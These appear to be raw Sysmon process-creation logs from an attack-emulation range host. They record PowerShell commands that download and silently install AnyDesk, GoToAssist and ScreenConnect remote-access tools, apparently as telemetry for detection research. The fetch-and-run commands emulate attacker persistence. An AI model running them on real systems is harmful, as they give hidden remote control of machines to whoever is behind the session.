154100x800000000000000030485055Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-117-2022-08-23 03:52:38.672{C2494F38-4F06-6304-D90E-000000006602}7000C:\Program Files (x86)\GoToAssist Remote Support Expert\1702\g2ax_session_expert.exe4.8 Build 1702GoToAssistGoToAssistLogMeIn, Inc.GoToAssist Remote Support.exe"C:\Program Files (x86)\GoToAssist Remote Support Expert\1702\g2ax_session_expert.exe" "StartID={1C2D72B0-71DD-421F-9133-4B43EFFEB937}&ResourceDll=g2ax_expert_resource_win32_x86_en_US.dll&Debug=On&Stat=On&StatDb=On&Index=1"C:\Program Files (x86)\GoToAssist Remote Support Expert\1702\WIN-HOST-MHAAG-\Administrator{C2494F38-F592-6303-34F9-090000000000}0x9f9342HighMD5=71C703EA85154A4E246A04C6B40DEDC1,SHA256=F5CFC449095104529B490B8FE6015B9F77FD83E4A1B378D8DC091C24AE5A95DC{C2494F38-4F05-6304-D30E-000000006602}9308C:\Program Files (x86)\GoToAssist Remote Support Expert\1702\g2ax_comm_expert.exe"C:\Program Files (x86)\GoToAssist Remote Support Expert\1702\g2ax_comm_expert.exe" "Action=Default&Build=1702&colClientUiReadyEvent=Global\1BEAAE5C-6062-416B-91AC-20CA32C440A3&Debug=On&Digest=71c703ea85154a4e246a04c6b40dedc1&EGWAddress=3.218.246.74,52.55.102.23&EGWDNS=egw1.express.gotoassist.com&EGWPort=8200,80,443&Language=en_US&LoaderPath=C:\Program Files (x86)\GoToAssist Remote Support Expert\1702\g2ax_start.exe&locale=en_US&LogLevel=Normal&LogName=C:\Users\ADMINI~1\AppData\Local\Temp\2\LogMeInLogs\GoToAssist Remote Support Expert\1702\20220823_035236\GoToAssist Remote Support Expert.log&LogPath=C:\Users\ADMINI~1\AppData\Local\Temp\2\LogMeInLogs\GoToAssist Remote Support Expert\1702\20220823_035236\&ResourceDll=g2ax_expert_resource_win32_x86_en_US.dll&RestartReason=Start&ServiceAllowed=Yes&sessionTrackingId=e0-FaCddxmtMoX8_cY4czssnTeGvy83i&StartAsService=Yes&Stat=On&StatDb=On&UninstallService=No&UniqueId=2710"WIN-HOST-MHAAG-\Administrator 154100x800000000000000030484585Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-117-2022-08-23 03:52:37.540{C2494F38-4F05-6304-D70E-000000006602}6028C:\Windows\System32\conhost.exe10.0.14393.0 (rs1_release.160715-1616)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsWIN-HOST-MHAAG-\Administrator{C2494F38-F592-6303-34F9-090000000000}0x9f9342HighMD5=D752C96401E2540A443C599154FC6FA9,SHA256=046F7A1B4DE67562547ED9A180A72F481FC41E803DE49A96D7D7C731964D53A0{C2494F38-4F05-6304-D60E-000000006602}8792C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\ADMINI~1\AppData\Local\Temp\2\A6A035DE-0900-4D1A-A7C1-A8BFE9843A68.bat" "C:\Users\Administrator\Downloads\GoToAssist.exe""WIN-HOST-MHAAG-\Administrator 154100x800000000000000030484567Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-117-2022-08-23 03:52:37.529{C2494F38-4F05-6304-D60E-000000006602}8792C:\Windows\SysWOW64\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Users\ADMINI~1\AppData\Local\Temp\2\A6A035DE-0900-4D1A-A7C1-A8BFE9843A68.bat" "C:\Users\Administrator\Downloads\GoToAssist.exe""C:\Users\ADMINI~1\AppData\Local\Temp\2\WIN-HOST-MHAAG-\Administrator{C2494F38-F592-6303-34F9-090000000000}0x9f9342HighMD5=0FEC5F30E705EADAEA5E9144F2FB12DC,SHA256=614CA7B627533E22AA3E5C3594605DC6FE6F000B0CC2B845ECE47CA60673EC7F{C2494F38-4F02-6304-CE0E-000000006602}9284C:\Users\ADMINI~1\AppData\Local\Temp\2\01628ea9\GoToAssist.exe"C:\Users\Administrator\Downloads\GoToAssist.exe" /S "/initialPath C:\Users\Administrator\Downloads\GoToAssist.exe"WIN-HOST-MHAAG-\Administrator 154100x800000000000000030484007Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-117-2022-08-23 03:52:37.294{C2494F38-4F05-6304-D50E-000000006602}7976C:\Program Files (x86)\GoToAssist Remote Support Expert\1702\g2ax_user_expert.exe4.8 Build 1702GoToAssistGoToAssistLogMeIn, Inc.GoToAssist Remote Support.exe"C:\Program Files (x86)\GoToAssist Remote Support Expert\1702\g2ax_user_expert.exe" "StartID={B32A708B-A5D4-4B29-AF98-600B48A630A9}&ResourceDll=g2ax_expert_resource_win32_x86_en_US.dll&Debug=On&Stat=On&StatDb=On&Index=0"C:\Program Files (x86)\GoToAssist Remote Support Expert\1702\WIN-HOST-MHAAG-\Administrator{C2494F38-F592-6303-34F9-090000000000}0x9f9342HighMD5=71C703EA85154A4E246A04C6B40DEDC1,SHA256=F5CFC449095104529B490B8FE6015B9F77FD83E4A1B378D8DC091C24AE5A95DC{C2494F38-4F05-6304-D30E-000000006602}9308C:\Program Files (x86)\GoToAssist Remote Support Expert\1702\g2ax_comm_expert.exe"C:\Program Files (x86)\GoToAssist Remote Support Expert\1702\g2ax_comm_expert.exe" "Action=Default&Build=1702&colClientUiReadyEvent=Global\1BEAAE5C-6062-416B-91AC-20CA32C440A3&Debug=On&Digest=71c703ea85154a4e246a04c6b40dedc1&EGWAddress=3.218.246.74,52.55.102.23&EGWDNS=egw1.express.gotoassist.com&EGWPort=8200,80,443&Language=en_US&LoaderPath=C:\Program Files (x86)\GoToAssist Remote Support Expert\1702\g2ax_start.exe&locale=en_US&LogLevel=Normal&LogName=C:\Users\ADMINI~1\AppData\Local\Temp\2\LogMeInLogs\GoToAssist Remote Support Expert\1702\20220823_035236\GoToAssist Remote Support Expert.log&LogPath=C:\Users\ADMINI~1\AppData\Local\Temp\2\LogMeInLogs\GoToAssist Remote Support Expert\1702\20220823_035236\&ResourceDll=g2ax_expert_resource_win32_x86_en_US.dll&RestartReason=Start&ServiceAllowed=Yes&sessionTrackingId=e0-FaCddxmtMoX8_cY4czssnTeGvy83i&StartAsService=Yes&Stat=On&StatDb=On&UninstallService=No&UniqueId=2710"WIN-HOST-MHAAG-\Administrator 154100x800000000000000030483672Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-117-2022-08-23 03:52:37.060{C2494F38-4F05-6304-D30E-000000006602}9308C:\Program Files (x86)\GoToAssist Remote Support Expert\1702\g2ax_comm_expert.exe4.8 Build 1702GoToAssistGoToAssistLogMeIn, Inc.GoToAssist Remote Support.exe"C:\Program Files (x86)\GoToAssist Remote Support Expert\1702\g2ax_comm_expert.exe" "Action=Default&Build=1702&colClientUiReadyEvent=Global\1BEAAE5C-6062-416B-91AC-20CA32C440A3&Debug=On&Digest=71c703ea85154a4e246a04c6b40dedc1&EGWAddress=3.218.246.74,52.55.102.23&EGWDNS=egw1.express.gotoassist.com&EGWPort=8200,80,443&Language=en_US&LoaderPath=C:\Program Files (x86)\GoToAssist Remote Support Expert\1702\g2ax_start.exe&locale=en_US&LogLevel=Normal&LogName=C:\Users\ADMINI~1\AppData\Local\Temp\2\LogMeInLogs\GoToAssist Remote Support Expert\1702\20220823_035236\GoToAssist Remote Support Expert.log&LogPath=C:\Users\ADMINI~1\AppData\Local\Temp\2\LogMeInLogs\GoToAssist Remote Support Expert\1702\20220823_035236\&ResourceDll=g2ax_expert_resource_win32_x86_en_US.dll&RestartReason=Start&ServiceAllowed=Yes&sessionTrackingId=e0-FaCddxmtMoX8_cY4czssnTeGvy83i&StartAsService=Yes&Stat=On&StatDb=On&UninstallService=No&UniqueId=2710"C:\Program Files (x86)\GoToAssist Remote Support Expert\1702\WIN-HOST-MHAAG-\Administrator{C2494F38-F592-6303-34F9-090000000000}0x9f9342HighMD5=71C703EA85154A4E246A04C6B40DEDC1,SHA256=F5CFC449095104529B490B8FE6015B9F77FD83E4A1B378D8DC091C24AE5A95DC{C2494F38-4F04-6304-D20E-000000006602}10000C:\Program Files (x86)\GoToAssist Remote Support Expert\1702\g2ax_start.exe"C:\Program Files (x86)\GoToAssist Remote Support Expert\1702\g2ax_start.exe" "/Action Default" "/Build 1702" "/Debug On" "/EGWAddress 3.218.246.74,52.55.102.23" "/EGWDNS egw1.express.gotoassist.com" "/EGWPort 8200,80,443" "/Language en_US" "/LoaderPath C:\Users\Administrator\AppData\Local\GoToAssist Remote Support Expert\g2ax_expert_combined_dll_core_win32_x86_1702.exe" "/LogLevel Normal" "/LogPath C:\Users\ADMINI~1\AppData\Local\Temp\2\LogMeInLogs\GoToAssist Remote Support Expert\1702\20220823_035236\" "/ResourceDll g2ax_expert_resource_win32_x86_en_US.dll" "/RestartReason Start" "/ServiceAllowed Yes" "/StartAsService Yes" "/Stat On" "/StatDb On" "/UninstallService No" "/colClientUiReadyEvent Global\1BEAAE5C-6062-416B-91AC-20CA32C440A3" "/locale en_US" "/sessionTrackingId e0-FaCddxmtMoX8_cY4czssnTeGvy83i"WIN-HOST-MHAAG-\Administrator 154100x800000000000000030483174Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-117-2022-08-23 03:52:36.835{C2494F38-4F04-6304-D20E-000000006602}10000C:\Program Files (x86)\GoToAssist Remote Support Expert\1702\g2ax_start.exe4.8 Build 1702GoToAssistGoToAssistLogMeIn, Inc.GoToAssist Remote Support.exe"C:\Program Files (x86)\GoToAssist Remote Support Expert\1702\g2ax_start.exe" "/Action Default" "/Build 1702" "/Debug On" "/EGWAddress 3.218.246.74,52.55.102.23" "/EGWDNS egw1.express.gotoassist.com" "/EGWPort 8200,80,443" "/Language en_US" "/LoaderPath C:\Users\Administrator\AppData\Local\GoToAssist Remote Support Expert\g2ax_expert_combined_dll_core_win32_x86_1702.exe" "/LogLevel Normal" "/LogPath C:\Users\ADMINI~1\AppData\Local\Temp\2\LogMeInLogs\GoToAssist Remote Support Expert\1702\20220823_035236\" "/ResourceDll g2ax_expert_resource_win32_x86_en_US.dll" "/RestartReason Start" "/ServiceAllowed Yes" "/StartAsService Yes" "/Stat On" "/StatDb On" "/UninstallService No" "/colClientUiReadyEvent Global\1BEAAE5C-6062-416B-91AC-20CA32C440A3" "/locale en_US" "/sessionTrackingId e0-FaCddxmtMoX8_cY4czssnTeGvy83i"C:\Program Files (x86)\GoToAssist Remote Support Expert\1702\WIN-HOST-MHAAG-\Administrator{C2494F38-F592-6303-34F9-090000000000}0x9f9342HighMD5=71C703EA85154A4E246A04C6B40DEDC1,SHA256=F5CFC449095104529B490B8FE6015B9F77FD83E4A1B378D8DC091C24AE5A95DC{C2494F38-4F04-6304-D10E-000000006602}10164C:\Users\ADMINI~1\AppData\Local\Temp\2\LogMeInInc\GoToAssist Remote Support Expert\1702\g2a9754.tmp\g2ax_installerexpert.exe"C:\Users\ADMINI~1\AppData\Local\Temp\2\LogMeInInc\GoToAssist Remote Support Expert\1702\g2a9754.tmp\g2ax_installerexpert.exe " "/Action Default" "/Build 1702" "/Debug On" "/EGWAddress 3.218.246.74,52.55.102.23" "/EGWDNS egw1.express.gotoassist.com" "/EGWPort 8200,80,443" "/Language en_US" "/LoaderPath C:\Users\Administrator\AppData\Local\GoToAssist Remote Support Expert\g2ax_expert_combined_dll_core_win32_x86_1702.exe" "/LogLevel Normal" "/LogPath C:\Users\ADMINI~1\AppData\Local\Temp\2\LogMeInLogs\GoToAssist Remote Support Expert\1702\20220823_035236\" "/ResourceDll g2ax_expert_resource_win32_x86_en_US.dll" "/RestartReason Start" "/ServiceAllowed Yes" "/StartAsService Yes" "/Stat On" "/StatDb On" "/UninstallService No" "/colClientUiReadyEvent Global\1BEAAE5C-6062-416B-91AC-20CA32C440A3" "/locale en_US" "/sessionTrackingId e0-FaCddxmtMoX8_cY4czssnTeGvy83i"WIN-HOST-MHAAG-\Administrator 154100x800000000000000030482828Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-117-2022-08-23 03:52:36.472{C2494F38-4F04-6304-D10E-000000006602}10164C:\Users\ADMINI~1\AppData\Local\Temp\2\LogMeInInc\GoToAssist Remote Support Expert\1702\g2a9754.tmp\g2ax_installerexpert.exe4.8 Build 1702GoToAssistGoToAssistLogMeIn, Inc.GoToAssist Remote Support.exe"C:\Users\ADMINI~1\AppData\Local\Temp\2\LogMeInInc\GoToAssist Remote Support Expert\1702\g2a9754.tmp\g2ax_installerexpert.exe " "/Action Default" "/Build 1702" "/Debug On" "/EGWAddress 3.218.246.74,52.55.102.23" "/EGWDNS egw1.express.gotoassist.com" "/EGWPort 8200,80,443" "/Language en_US" "/LoaderPath C:\Users\Administrator\AppData\Local\GoToAssist Remote Support Expert\g2ax_expert_combined_dll_core_win32_x86_1702.exe" "/LogLevel Normal" "/LogPath C:\Users\ADMINI~1\AppData\Local\Temp\2\LogMeInLogs\GoToAssist Remote Support Expert\1702\20220823_035236\" "/ResourceDll g2ax_expert_resource_win32_x86_en_US.dll" "/RestartReason Start" "/ServiceAllowed Yes" "/StartAsService Yes" "/Stat On" "/StatDb On" "/UninstallService No" "/colClientUiReadyEvent Global\1BEAAE5C-6062-416B-91AC-20CA32C440A3" "/locale en_US" "/sessionTrackingId e0-FaCddxmtMoX8_cY4czssnTeGvy83i"C:\Users\ADMINI~1\AppData\Local\Temp\2\LogMeInInc\GoToAssist Remote Support Expert\1702\g2a9754.tmp\WIN-HOST-MHAAG-\Administrator{C2494F38-F592-6303-34F9-090000000000}0x9f9342HighMD5=71C703EA85154A4E246A04C6B40DEDC1,SHA256=F5CFC449095104529B490B8FE6015B9F77FD83E4A1B378D8DC091C24AE5A95DC{C2494F38-4F03-6304-D00E-000000006602}8760C:\Users\Administrator\AppData\Local\GoToAssist Remote Support Expert\g2ax_expert_combined_dll_core_win32_x86_1702.exe"C:\Users\Administrator\AppData\Local\GoToAssist Remote Support Expert\g2ax_expert_combined_dll_core_win32_x86_1702.exe" "/Action Default" "/Build 1702" "/Debug On" "/EGWAddress 3.218.246.74,52.55.102.23" "/EGWDNS egw1.express.gotoassist.com" "/EGWPort 8200,80,443" "/Language en_US" "/LogLevel Normal" "/ResourceDll g2ax_expert_resource_win32_x86_en_US.dll" "/ServiceAllowed Yes" "/StartAsService Yes" "/Stat On" "/StatDb On" "/UninstallService No" "/colClientUiReadyEvent Global\1BEAAE5C-6062-416B-91AC-20CA32C440A3" "/locale en_US" "/sessionTrackingId e0-FaCddxmtMoX8_cY4czssnTeGvy83i"WIN-HOST-MHAAG-\Administrator 154100x800000000000000030482604Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-117-2022-08-23 03:52:35.741{C2494F38-4F03-6304-D00E-000000006602}8760C:\Users\Administrator\AppData\Local\GoToAssist Remote Support Expert\g2ax_expert_combined_dll_core_win32_x86_1702.exe4.8 Build 1702GoToAssistGoToAssistLogMeIn, Inc.GoToAssist Remote Support.exe"C:\Users\Administrator\AppData\Local\GoToAssist Remote Support Expert\g2ax_expert_combined_dll_core_win32_x86_1702.exe" "/Action Default" "/Build 1702" "/Debug On" "/EGWAddress 3.218.246.74,52.55.102.23" "/EGWDNS egw1.express.gotoassist.com" "/EGWPort 8200,80,443" "/Language en_US" "/LogLevel Normal" "/ResourceDll g2ax_expert_resource_win32_x86_en_US.dll" "/ServiceAllowed Yes" "/StartAsService Yes" "/Stat On" "/StatDb On" "/UninstallService No" "/colClientUiReadyEvent Global\1BEAAE5C-6062-416B-91AC-20CA32C440A3" "/locale en_US" "/sessionTrackingId e0-FaCddxmtMoX8_cY4czssnTeGvy83i"C:\Users\Administrator\AppData\Local\GoToAssist Remote Support Expert\WIN-HOST-MHAAG-\Administrator{C2494F38-F592-6303-34F9-090000000000}0x9f9342HighMD5=FDE0E1B5C13DBC7CE1CE0E88A30E993A,SHA256=0DB5CC40EE41D2BA148720097AA58BEEC26F41530DA25E424F9C10B6323C0B2D{C2494F38-4F02-6304-CE0E-000000006602}9284C:\Users\ADMINI~1\AppData\Local\Temp\2\01628ea9\GoToAssist.exe"C:\Users\Administrator\Downloads\GoToAssist.exe" /S "/initialPath C:\Users\Administrator\Downloads\GoToAssist.exe"WIN-HOST-MHAAG-\Administrator 154100x800000000000000030481837Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-117-2022-08-23 03:52:35.105{C2494F38-4F03-6304-CF0E-000000006602}9192C:\Windows\SysWOW64\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\ADMINI~1\AppData\Local\Temp\2\0953541C-2AC0-4E4D-BC31-B86C69242E7B\GoToOpener.msi" /q /lvx "C:\Users\ADMINI~1\AppData\Local\Temp\2\LogMeInLogs\GoToOpenerMsi\4EC14CB9-AF76-43FF-8902-F8B6E3628BE1.log"C:\Users\ADMINI~1\AppData\Local\Temp\2\01628ea9\WIN-HOST-MHAAG-\Administrator{C2494F38-F592-6303-34F9-090000000000}0x9f9342HighMD5=0BDEAEA7BB4AE7822416CD37EA8EE00D,SHA256=5C188CE4E21FAB002B4D669F91FA19341AB4260F83D798FDAC53229D675DB6BA{C2494F38-4F02-6304-CE0E-000000006602}9284C:\Users\ADMINI~1\AppData\Local\Temp\2\01628ea9\GoToAssist.exe"C:\Users\Administrator\Downloads\GoToAssist.exe" /S "/initialPath C:\Users\Administrator\Downloads\GoToAssist.exe"WIN-HOST-MHAAG-\Administrator 154100x800000000000000030480602Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-117-2022-08-23 03:52:34.209{C2494F38-4F02-6304-CE0E-000000006602}9284C:\Users\ADMINI~1\AppData\Local\Temp\2\01628ea9\GoToAssist.exe1.0.0.562GoTo OpenerGoTo OpenerLogMeIn, Inc.GoToOpener.exe"C:\Users\Administrator\Downloads\GoToAssist.exe" /S "/initialPath C:\Users\Administrator\Downloads\GoToAssist.exe"C:\Users\ADMINI~1\AppData\Local\Temp\2\01628ea9\WIN-HOST-MHAAG-\Administrator{C2494F38-F592-6303-34F9-090000000000}0x9f9342HighMD5=D8A7DD0A6E3B89F819662280CFE67498,SHA256=33B1AF4C6D7E05395A2806B173D6A87825B7D6741736CF02CF0FE1E535958A9D{C2494F38-4F01-6304-CB0E-000000006602}8012C:\Users\Administrator\Downloads\GoToAssist.exe"C:\Users\Administrator\Downloads\GoToAssist.exe" /S WIN-HOST-MHAAG-\Administrator 154100x800000000000000030480186Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-117-2022-08-23 03:52:34.099{C2494F38-4F02-6304-CD0E-000000006602}4140C:\Windows\System32\conhost.exe10.0.14393.0 (rs1_release.160715-1616)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsWIN-HOST-MHAAG-\Administrator{C2494F38-F592-6303-34F9-090000000000}0x9f9342HighMD5=D752C96401E2540A443C599154FC6FA9,SHA256=046F7A1B4DE67562547ED9A180A72F481FC41E803DE49A96D7D7C731964D53A0{C2494F38-4F02-6304-CC0E-000000006602}7176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & {$installer = \""C:\Users\$env:username\Downloads\ScreenConnect.msi\"" Invoke-WebRequest -OutFile $installer \""https://d1kuyuqowve5id.cloudfront.net/ScreenConnect_21.11.4237.7885_Release.msi\"" msiexec /i $installer /qn}WIN-HOST-MHAAG-\Administrator 154100x800000000000000030480177Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-117-2022-08-23 03:52:34.095{C2494F38-4F02-6304-CC0E-000000006602}7176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"powershell.exe" & {$installer = \""C:\Users\$env:username\Downloads\ScreenConnect.msi\"" Invoke-WebRequest -OutFile $installer \""https://d1kuyuqowve5id.cloudfront.net/ScreenConnect_21.11.4237.7885_Release.msi\"" msiexec /i $installer /qn}C:\Users\ADMINI~1\AppData\Local\Temp\2\WIN-HOST-MHAAG-\Administrator{C2494F38-F592-6303-34F9-090000000000}0x9f9342HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{C2494F38-37D7-6304-8D0B-000000006602}4172C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" WIN-HOST-MHAAG-\Administrator 154100x800000000000000030480104Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-117-2022-08-23 03:52:33.995{C2494F38-4F01-6304-CB0E-000000006602}8012C:\Users\Administrator\Downloads\GoToAssist.exe1.0.0.562GoTo OpenerGoTo OpenerLogMeIn, Inc.GoToOpener.exe"C:\Users\Administrator\Downloads\GoToAssist.exe" /S C:\Users\Administrator\AppData\Local\Temp\2\WIN-HOST-MHAAG-\Administrator{C2494F38-F592-6303-34F9-090000000000}0x9f9342HighMD5=D8A7DD0A6E3B89F819662280CFE67498,SHA256=33B1AF4C6D7E05395A2806B173D6A87825B7D6741736CF02CF0FE1E535958A9D{C2494F38-4EFF-6304-C80E-000000006602}9820C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & {Invoke-WebRequest -OutFile C:\Users\$env:username\Downloads\GoToAssist.exe \""https://launch.getgo.com/launcher2/helper?token=e0-FaCddxmtMoX8_cY4czssnTeGvy83ihp8CLREfvwQshiBW0_RcbdoaEp8IA-Qn8wpbKlpGIflS-39gW6RuWRM-XHwtkRVMLBsp5RSKp-a3PBM-Pb1Fliy73EDgoaxr-q83WtXbLKqD7-u3cfDl9gKsymmhdkTGsXcDXir90NqKj92LsN_KpyYwV06lIxsdRekhNZjNwhkWrBa_hG8RQJqWSGk6tkZLVMuMufmn37eC2Cqqiwq5bCGnH5dYiSUUsklSedRLjh4N46qPYT1bAU0qD25ZPr-Kvf4Kzu9bT02q3Yntj02ZA99TxL2-SKzgryizoopBPg4Ilfo5t78UxKTYeEwo4etQECfkCRvenkTRlIHmowdbd88zz7NiccXnbHJZehgs6_-JSVjQIdPTXZbF9T5z44mi4BQYMtZAS3DE86F0C3D4Tcd7fa5F6Ve8rQWt7pvqFCYyiJAailslxOw0LsGyFokoy65tMF980ReP8zhVcTKYP8s8mhGXihUQJQPNk20Sw&downloadTrigger=restart&renameFile=1\"" $file1 = \""C:\Users\\"" + $env:username + \""\Downloads\GoToAssist.exe\"" Start-Process $file1 /S;}WIN-HOST-MHAAG-\Administrator 154100x800000000000000030478469Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-117-2022-08-23 03:52:31.886{C2494F38-4EFF-6304-C90E-000000006602}9552C:\Windows\System32\conhost.exe10.0.14393.0 (rs1_release.160715-1616)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsWIN-HOST-MHAAG-\Administrator{C2494F38-F592-6303-34F9-090000000000}0x9f9342HighMD5=D752C96401E2540A443C599154FC6FA9,SHA256=046F7A1B4DE67562547ED9A180A72F481FC41E803DE49A96D7D7C731964D53A0{C2494F38-4EFF-6304-C80E-000000006602}9820C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & {Invoke-WebRequest -OutFile C:\Users\$env:username\Downloads\GoToAssist.exe \""https://launch.getgo.com/launcher2/helper?token=e0-FaCddxmtMoX8_cY4czssnTeGvy83ihp8CLREfvwQshiBW0_RcbdoaEp8IA-Qn8wpbKlpGIflS-39gW6RuWRM-XHwtkRVMLBsp5RSKp-a3PBM-Pb1Fliy73EDgoaxr-q83WtXbLKqD7-u3cfDl9gKsymmhdkTGsXcDXir90NqKj92LsN_KpyYwV06lIxsdRekhNZjNwhkWrBa_hG8RQJqWSGk6tkZLVMuMufmn37eC2Cqqiwq5bCGnH5dYiSUUsklSedRLjh4N46qPYT1bAU0qD25ZPr-Kvf4Kzu9bT02q3Yntj02ZA99TxL2-SKzgryizoopBPg4Ilfo5t78UxKTYeEwo4etQECfkCRvenkTRlIHmowdbd88zz7NiccXnbHJZehgs6_-JSVjQIdPTXZbF9T5z44mi4BQYMtZAS3DE86F0C3D4Tcd7fa5F6Ve8rQWt7pvqFCYyiJAailslxOw0LsGyFokoy65tMF980ReP8zhVcTKYP8s8mhGXihUQJQPNk20Sw&downloadTrigger=restart&renameFile=1\"" $file1 = \""C:\Users\\"" + $env:username + \""\Downloads\GoToAssist.exe\"" Start-Process $file1 /S;}WIN-HOST-MHAAG-\Administrator 154100x800000000000000030478461Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-117-2022-08-23 03:52:31.876{C2494F38-4EFF-6304-C80E-000000006602}9820C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"powershell.exe" & {Invoke-WebRequest -OutFile C:\Users\$env:username\Downloads\GoToAssist.exe \""https://launch.getgo.com/launcher2/helper?token=e0-FaCddxmtMoX8_cY4czssnTeGvy83ihp8CLREfvwQshiBW0_RcbdoaEp8IA-Qn8wpbKlpGIflS-39gW6RuWRM-XHwtkRVMLBsp5RSKp-a3PBM-Pb1Fliy73EDgoaxr-q83WtXbLKqD7-u3cfDl9gKsymmhdkTGsXcDXir90NqKj92LsN_KpyYwV06lIxsdRekhNZjNwhkWrBa_hG8RQJqWSGk6tkZLVMuMufmn37eC2Cqqiwq5bCGnH5dYiSUUsklSedRLjh4N46qPYT1bAU0qD25ZPr-Kvf4Kzu9bT02q3Yntj02ZA99TxL2-SKzgryizoopBPg4Ilfo5t78UxKTYeEwo4etQECfkCRvenkTRlIHmowdbd88zz7NiccXnbHJZehgs6_-JSVjQIdPTXZbF9T5z44mi4BQYMtZAS3DE86F0C3D4Tcd7fa5F6Ve8rQWt7pvqFCYyiJAailslxOw0LsGyFokoy65tMF980ReP8zhVcTKYP8s8mhGXihUQJQPNk20Sw&downloadTrigger=restart&renameFile=1\"" $file1 = \""C:\Users\\"" + $env:username + \""\Downloads\GoToAssist.exe\"" Start-Process $file1 /S;}C:\Users\ADMINI~1\AppData\Local\Temp\2\WIN-HOST-MHAAG-\Administrator{C2494F38-F592-6303-34F9-090000000000}0x9f9342HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{C2494F38-37D7-6304-8D0B-000000006602}4172C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" WIN-HOST-MHAAG-\Administrator 154100x800000000000000030474161Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-117-2022-08-23 03:52:15.847{C2494F38-4EEF-6304-B80E-000000006602}8760C:\Users\Administrator\Desktop\AnyDesk.exe7.0.14AnyDeskAnyDeskAnyDesk Software GmbH-"C:\Users\Administrator\Desktop\AnyDesk.exe" /S C:\Users\Administrator\AppData\Local\Temp\2\WIN-HOST-MHAAG-\Administrator{C2494F38-F592-6303-34F9-090000000000}0x9f9342HighMD5=2621B754576047A6E94ACBF1DD4FE0EF,SHA256=109B03FFC45231E5A4C8805A10926492890F7B568F8A93ABE1FA495B4BD42975{C2494F38-4EE8-6304-B30E-000000006602}9468C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & {Invoke-WebRequest -OutFile C:\Users\$env:username\Desktop\AnyDesk.exe https://download.anydesk.com/AnyDesk.exe $file1 = \""C:\Users\\"" + $env:username + \""\Desktop\AnyDesk.exe\"" Start-Process $file1 /S;}WIN-HOST-MHAAG-\Administrator 154100x800000000000000030471324Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-117-2022-08-23 03:52:08.602{C2494F38-4EE8-6304-B40E-000000006602}5512C:\Windows\System32\conhost.exe10.0.14393.0 (rs1_release.160715-1616)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsWIN-HOST-MHAAG-\Administrator{C2494F38-F592-6303-34F9-090000000000}0x9f9342HighMD5=D752C96401E2540A443C599154FC6FA9,SHA256=046F7A1B4DE67562547ED9A180A72F481FC41E803DE49A96D7D7C731964D53A0{C2494F38-4EE8-6304-B30E-000000006602}9468C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & {Invoke-WebRequest -OutFile C:\Users\$env:username\Desktop\AnyDesk.exe https://download.anydesk.com/AnyDesk.exe $file1 = \""C:\Users\\"" + $env:username + \""\Desktop\AnyDesk.exe\"" Start-Process $file1 /S;}WIN-HOST-MHAAG-\Administrator 154100x800000000000000030471317Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-117-2022-08-23 03:52:08.596{C2494F38-4EE8-6304-B30E-000000006602}9468C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"powershell.exe" & {Invoke-WebRequest -OutFile C:\Users\$env:username\Desktop\AnyDesk.exe https://download.anydesk.com/AnyDesk.exe $file1 = 